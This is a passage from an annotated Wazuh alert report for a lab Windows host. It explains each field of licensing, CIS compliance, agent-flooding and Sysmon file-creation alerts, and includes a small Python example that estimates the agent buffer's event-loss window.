rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533946.523838
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
Provider: the Software Protection Platform, Windows' licensing/activation service. Licensing noise, not a security provider.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
Provider GUID for Security‑SPP.

data.win.system.eventSourceName:  Software Protection Platform Service
Legacy event-source name, present because SPP writes classic (non-manifest) Application-log events.

data.win.system.eventID:  8198
Event ID within the Application log. 8198 from Security‑SPP is a failed automatic activation attempt: not a Security-log ID and not attacker behaviour.

data.win.system.version:  0
Event schema version; 0 for these classic events.

data.win.system.level:  2
Windows level 2 = Error, matching severityValue ERROR below. It reflects the activation failing, not risk.

data.win.system.task:  0
Task category; 0 = none for this provider.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:19.2047110Z
When Windows wrote the event (UTC). Within seconds of the Wazuh timestamp, so this one is live, unlike the backlogged Sysmon events above.

data.win.system.eventRecordID:  2396
Incremental log record number – handy for timeline order.

data.win.system.processID:  1832
PID of the SPP service that logged the event.

data.win.system.threadID:  0
Thread ID; 0 for these classic events.

data.win.system.channel:  Application
The Windows Application log, the classic channel for application and service errors.

data.win.system.computer:  Attacker
Computer name stamped into the event; matches agent.name.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "License Activation (slui.exe) failed with the following error code: hr=0x80004005 Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent"
Rendered text. hr=0x80004005 is E_FAIL (unspecified error) from the activation call; Action=AutoActivate and Trigger=TimerEvent mean the OS retried on its own timer, not a user action. Typical of an unactivated or offline lab VM.

data.win.eventdata.data:  hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Parsed copy of the same arguments, handy for filtering on hr or Trigger.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:30.387+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:30.387+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19012
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
CIS Critical Security Controls mapping (safeguard 5.2).

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533950.526135
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26001
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting defines how long a user can use their password before it expires. Values for this policy setting range from 0 to 999 days. If you set the value to 0, the password will never expire. Because attackers can crack passwords, the more frequently you change the password the less opportunity an attacker has to use a cracked password. However, the lower this value is set, the higher the potential for an increase in calls to help desk support due to users having to change their password or forgetting which password is current. The recommended state for this setting is 365 or fewer days, but not 0. Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The longer a password exists the higher the likelihood that it will be compromised by a brute force attack, by an attacker gaining general knowledge about the user, or by the user sharing the password. Configuring the Maximum password age setting to 0 so that users are never required to change their passwords is a major security risk because that allows a compromised password to be used by the malicious user for as long as the valid user has authorized access.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to 365 or fewer days, but not 0: Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Maximum password age
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.2
Benchmark section this check implements (1.1.2 in the Windows 11 benchmark).

data.sca.check.compliance.cis_csc:  5.2
Same CIS Critical Security Controls safeguard as rule.cis_csc above.

data.sca.check.command:  ['net.exe accounts']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
passed / failed / not applicable. Red only for failed; 'not applicable' here means the check could not be evaluated at all, see reason below.

data.sca.check.reason:  Timeout overtaken running command 'net.exe accounts'
Why the check could not be evaluated: 'net.exe accounts' hit the scanner's timeout. So the passed to not applicable change is a scan problem, not evidence that the password policy changed. Re-run net accounts on the host (and check whether the agent was under load) before raising a drift ticket.

data.sca.check.previous_result:  passed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is 90% full.

🧠 What happened? Agent event queue is 90% full.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:38.985+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:38.985+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is 90% full.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  202
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533958.531609
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: '90%'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  90%
Fill level of the agent's anti‑flooding client buffer ('90%', 'full', 'flooded'), reported by the agent itself. Not a severity; 90% is the early warning before events are dropped.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is full. Events may be lost.

🧠 What happened? Agent event queue is full. Events may be lost.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:41.379+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:41.379+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is full. Events may be lost.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  203
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533961.531836
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'full'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  full
Buffer state 'full': the agent's client buffer has no room, so new events can be discarded until it drains. Any telemetry from this host after this point may be incomplete.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is flooded. Check the agent configuration.

🧠 What happened? Agent event queue is flooded. Check the agent configuration.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:55.730+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:55.730+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is flooded. Check the agent configuration.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  204
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533975.532081
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'flooded'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  flooded
Buffer state 'flooded': the most severe state, raised after 'full' persists. Rule 204's own advice is to check the agent configuration, i.e. the client_buffer queue_size and events_per_second settings and the volume of the log sources feeding them. Expect gaps in this host's Sysmon timeline around these alerts.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  12
Score our script assigns, nominally 0‑10 (0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority). 12 here overflows the scale; read it as the top of the range.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
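The three agent_flooding alerts above (90%, then full, then flooded inside 17 seconds) mean the agent's anti-flooding buffer overflowed and telemetry from this host may be missing from that point on, which matters when reading the Sysmon alerts around them. The example below is added here and is not Wazuh or SOCscribe code: it parses a constructed client_buffer fragment from an agent ossec.conf (real option names; 5000 and 500 are the defaults Wazuh documents), estimates how quickly a burst fills the queue, and derives the window of possible loss from the alerts themselves. The 'normal' recovery message used to close the window is an assumption of the example.

```python
"""Agent anti-flooding buffer: config headroom and possible event-loss window.

Added example, not Wazuh or SOCscribe code. The ossec.conf fragment and the
burst rate are constructed; the recovery-message convention is an assumption.
"""
import xml.etree.ElementTree as ET
from datetime import datetime
from typing import Optional

# Wazuh documents these as the <client_buffer> defaults.
DEFAULT_QUEUE_SIZE = 5000
DEFAULT_EVENTS_PER_SECOND = 500

# Constructed sample of an agent ossec.conf; real files carry many more sections.
SAMPLE_OSSEC_CONF = """<ossec_config>
  <client_buffer>
    <disabled>no</disabled>
    <queue_size>5000</queue_size>
    <events_per_second>500</events_per_second>
  </client_buffer>
</ossec_config>"""


def parse_client_buffer(xml_text: str) -> dict:
    """Read <client_buffer>, falling back to the documented defaults."""
    cfg = {"disabled": False, "queue_size": DEFAULT_QUEUE_SIZE,
           "events_per_second": DEFAULT_EVENTS_PER_SECOND}
    cb = ET.fromstring(xml_text).find("client_buffer")
    if cb is None:
        return cfg
    for tag in cfg:
        node = cb.find(tag)
        if node is not None and node.text and node.text.strip():
            value = node.text.strip()
            cfg[tag] = value.lower() == "yes" if tag == "disabled" else int(value)
    return cfg


def seconds_until(cfg: dict, burst_eps: float, fraction: float) -> Optional[float]:
    """Seconds for the queue to reach `fraction` of capacity when a source
    emits burst_eps events/s and the agent drains events_per_second.
    None: the drain keeps up (or the buffer is disabled) and that level is never reached."""
    if cfg["disabled"]:
        return None  # no buffer at all: nothing queues and nothing is throttled
    surplus = burst_eps - cfg["events_per_second"]
    if surplus <= 0:
        return None
    return cfg["queue_size"] * fraction / surplus


# Buffer states the agent reports in data.level. Any other state (Wazuh sends
# 'normal' on recovery; treated here as an assumption) ends the loss window.
LOSSY_STATES = {"full", "flooded"}
WARNING_STATES = {"90%"}


def _ts(alert: dict) -> datetime:
    return datetime.strptime(alert["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")


def loss_window(alerts: list) -> Optional[tuple]:
    """(start, end) between which events from this agent may be missing:
    from the first 'full'/'flooded' alert to the first later non-buffer state.
    end is None when no recovery was seen; the result is None if never full."""
    start = None
    flood = sorted((a for a in alerts if "agent_flooding" in a["rule"]["groups"]), key=_ts)
    for alert in flood:
        level = alert["data"]["level"]
        if start is None and level in LOSSY_STATES:
            start = _ts(alert)
        elif start is not None and level not in LOSSY_STATES | WARNING_STATES:
            return (start, _ts(alert))
    return (start, None) if start is not None else None


# The three agent_flooding alerts from this report, reduced to the fields used.
SAMPLE_FLOOD_ALERTS = [
    {"timestamp": "2025-04-24T22:32:38.985+0000", "rule": {"id": "202", "groups": ["wazuh", "agent_flooding"]}, "data": {"level": "90%"}},
    {"timestamp": "2025-04-24T22:32:41.379+0000", "rule": {"id": "203", "groups": ["wazuh", "agent_flooding"]}, "data": {"level": "full"}},
    {"timestamp": "2025-04-24T22:32:55.730+0000", "rule": {"id": "204", "groups": ["wazuh", "agent_flooding"]}, "data": {"level": "flooded"}},
]

if __name__ == "__main__":
    cfg = parse_client_buffer(SAMPLE_OSSEC_CONF)
    print(cfg, "seconds to 90% at 2000 ev/s:", seconds_until(cfg, 2000, 0.9))
    print("possible loss window:", loss_window(SAMPLE_FLOOD_ALERTS))
```

With the defaults, a source producing 2000 events/s fills 90% of the queue in 3 seconds, so a Sysmon configuration that logs every FileCreate can exhaust the buffer long before anyone reads the 90% warning. For these alerts the window opens at the 'full' message (22:32:41) and never closes, which is the cue to treat every later event from this agent as possibly incomplete until a recovery message is found.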

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.048+0000 | 🧠 MITRE: Execution, Command and Control – Command and Scripting Interpreter, Ingress Tool Transfer [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.048+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.532353
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the Event ID and the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's and survives a renamed service or binary, so filter on it rather than on the name.

data.win.system.eventID:  11
Sysmon Event ID 11 = FileCreate: a file was written. Sysmon numbers its events separately from the classic Security log (4624, 4688, etc.), so read the ID against the Sysmon schema.

data.win.system.version:  2
Schema version of this Event ID's payload. A new version can add or rename eventdata fields, so re-check decoders and rules when it changes.

data.win.system.level:  4
Windows event level: 4 = Information. Sysmon logs everything at this level, so it says nothing about risk; use rule.level for that.

data.win.system.task:  11
Task category. For Sysmon it mirrors the Event ID (11 = FileCreate); for classic Security events it is the audit subcategory (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1079756Z
UTC time the endpoint wrote the event. Here 2025-04-17, a week before the alert timestamp: the event reached the manager late, and this is the time that belongs on the timeline.

data.win.system.eventRecordID:  215891
Position in the Sysmon/Operational log, incremental per host. The gaps between the alerted records in this series are events that matched no rule; pull them from the endpoint to see the whole burst.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the process that created the file; that one is eventdata.processId below.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. No investigative value beyond confirming the logging process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational has to be in the agent's localfile config or none of these alerts exist, so silence from a host is not evidence of quiet.

data.win.system.computer:  Attacker
Hostname Windows stamped into the event. Should equal agent.name; a mismatch means the agent was re-registered or the event was forwarded from elsewhere.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.099 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\CL_Utility.ps1 CreationUtcTime: 2025-04-17 16:47:59.099 User: Attacker\Attcker1"
Sysmon's rendered text: which account (User) and process (Image, ProcessId, ProcessGuid) created which file (TargetFilename) and when. The same values are parsed into data.win.eventdata.* below; query those rather than this string.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.099
UTC time Sysmon recorded the file creation, to the millisecond. Sequence the files in this burst on this field, not on the alert timestamp.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
Sysmon's unique ID for the creating process. Pivot on it to find that process's Event ID 1 (ProcessCreate, with command line and parent) and every other file it wrote; PIDs get reused, GUIDs do not.

data.win.eventdata.processId:  8224
PID of the process that wrote the file, meaningful only while that process is alive. Pivot on processGuid instead.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
Full path of the executable that created the file. Here taskhostw.exe, the Windows scheduled-task host: confirm it is the signed binary in System32 and identify the task it was running from this ProcessGuid's Event ID 1.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\CL_Utility.ps1
Path of the file that was created. An SDIAG_<GUID> folder under C:\Windows\Temp filling up with CL_/RS_/TS_/VF_*.ps1 and DiagPackage.dll is what Windows scripted diagnostics (troubleshooting packs) unpack, and a burst of them from taskhostw.exe is usually scheduled maintenance. Check that the folder holds only those files before closing the alert; a familiar-looking folder is also a good place to hide a dropper.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.099
Creation timestamp Sysmon read from the file itself. Normally equals utcTime; an older value means the file kept its original creation time (copied or moved in) or was timestomped.

data.win.eventdata.user:  Attacker\\Attcker1
Account the creating process ran as, HOST\user or DOMAIN\user. Here a local account on the host named Attacker (the domain part equals the computer name), so check which scheduled task runs in that user's context.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:33:01.110+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570 – Lateral Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.110+0000
When the Wazuh manager generated the alert, not when the event happened on the endpoint. The Sysmon systemTime below is a week earlier, so build the timeline on that field and treat this one as ingestion time.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.534988
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the Event ID and the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's and survives a renamed service or binary, so filter on it rather than on the name.

data.win.system.eventID:  11
Sysmon Event ID 11 = FileCreate: a file was written. Sysmon numbers its events separately from the classic Security log (4624, 4688, etc.), so read the ID against the Sysmon schema.

data.win.system.version:  2
Schema version of this Event ID's payload. A new version can add or rename eventdata fields, so re-check decoders and rules when it changes.

data.win.system.level:  4
Windows event level: 4 = Information. Sysmon logs everything at this level, so it says nothing about risk; use rule.level for that.

data.win.system.task:  11
Task category. For Sysmon it mirrors the Event ID (11 = FileCreate); for classic Security events it is the audit subcategory (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1250326Z
UTC time the endpoint wrote the event. Here 2025-04-17, a week before the alert timestamp: the event reached the manager late, and this is the time that belongs on the timeline.

data.win.system.eventRecordID:  215897
Position in the Sysmon/Operational log, incremental per host. The gaps between the alerted records in this series are events that matched no rule; pull them from the endpoint to see the whole burst.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the process that created the file; that one is eventdata.processId below.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. No investigative value beyond confirming the logging process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational has to be in the agent's localfile config or none of these alerts exist, so silence from a host is not evidence of quiet.

data.win.system.computer:  Attacker
Hostname Windows stamped into the event. Should equal agent.name; a mismatch means the agent was re-registered or the event was forwarded from elsewhere.

